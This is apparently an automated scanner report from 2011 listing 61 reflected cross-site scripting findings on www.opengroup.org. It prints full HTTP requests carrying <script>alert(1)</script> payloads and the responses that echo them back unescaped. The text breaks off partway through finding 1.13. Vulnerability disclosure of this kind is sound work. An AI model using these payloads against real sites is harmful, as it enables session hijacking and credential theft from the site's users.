XSS, www.opengroup.org, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Mon Feb 28 17:00:45 CST 2011.


1. Cross-site scripting (reflected)

1.1. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

1.2. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

1.3. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

1.4. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

1.5. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

1.6. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

1.7. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

1.8. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

1.9. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

1.10. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

1.11. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

1.12. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

1.13. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

1.14. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

1.15. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

1.16. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

1.17. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

1.18. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

1.19. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

1.20. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

1.21. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

1.22. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

1.23. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

1.24. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

1.25. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

1.26. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

1.27. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

1.28. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

1.29. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

1.30. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

1.31. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

1.32. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

1.33. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

1.34. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

1.35. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

1.36. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

1.37. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

1.38. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

1.39. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

1.40. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

1.41. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

1.42. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

1.43. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

1.44. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

1.45. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

1.46. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

1.47. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

1.48. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

1.49. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

1.50. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

1.51. http://www.opengroup.org/member/ [REST URL parameter 1]

1.52. http://www.opengroup.org/member/ [REST URL parameter 1]

1.53. http://www.opengroup.org/member/ [REST URL parameter 1]

1.54. http://www.opengroup.org/togaf/ [REST URL parameter 1]

1.55. http://www.opengroup.org/togaf/ [REST URL parameter 1]

1.56. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

1.57. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

1.58. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

1.59. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

1.60. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

1.61. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

2. HTML does not specify charset

2.1. http://www.opengroup.org/architecture/togaf8-doc/arch/

2.2. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html



1. Cross-site scripting (reflected)
There are 61 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71102--><script>alert(1)</script>ab500cf3d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ -->
...[SNIP]...

1.2. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca5d0<script>alert(1)</script>e940eee5ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4262

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/<br>
...[SNIP]...

1.3. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b5ef6--><script>alert(1)</script>8fb3022b3ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:31 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ -->
...[SNIP]...

1.4. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14af3<script>alert(1)</script>b843f19b2cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:28 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/<br>
...[SNIP]...

1.5. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d8ea<script>alert(1)</script>c79ebfc2275 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/<br>
...[SNIP]...

1.6. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fd8d0--><script>alert(1)</script>e0d16d1920c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:56 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ -->
...[SNIP]...

1.7. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b1689--><script>alert(1)</script>e2a73383cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm -->
...[SNIP]...

1.8. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c52"><script>alert(1)</script>f743f40b2e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm">
...[SNIP]...

1.9. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a499<script>alert(1)</script>2eeeb0b90fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm<br>
...[SNIP]...

1.10. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fff9<script>alert(1)</script>8559c6c8772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm<br>
...[SNIP]...

1.11. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload cd353--><script>alert(1)</script>471e5f4a359 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm -->
...[SNIP]...

1.12. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c907b"><script>alert(1)</script>22f08924d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm">
...[SNIP]...

1.13. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
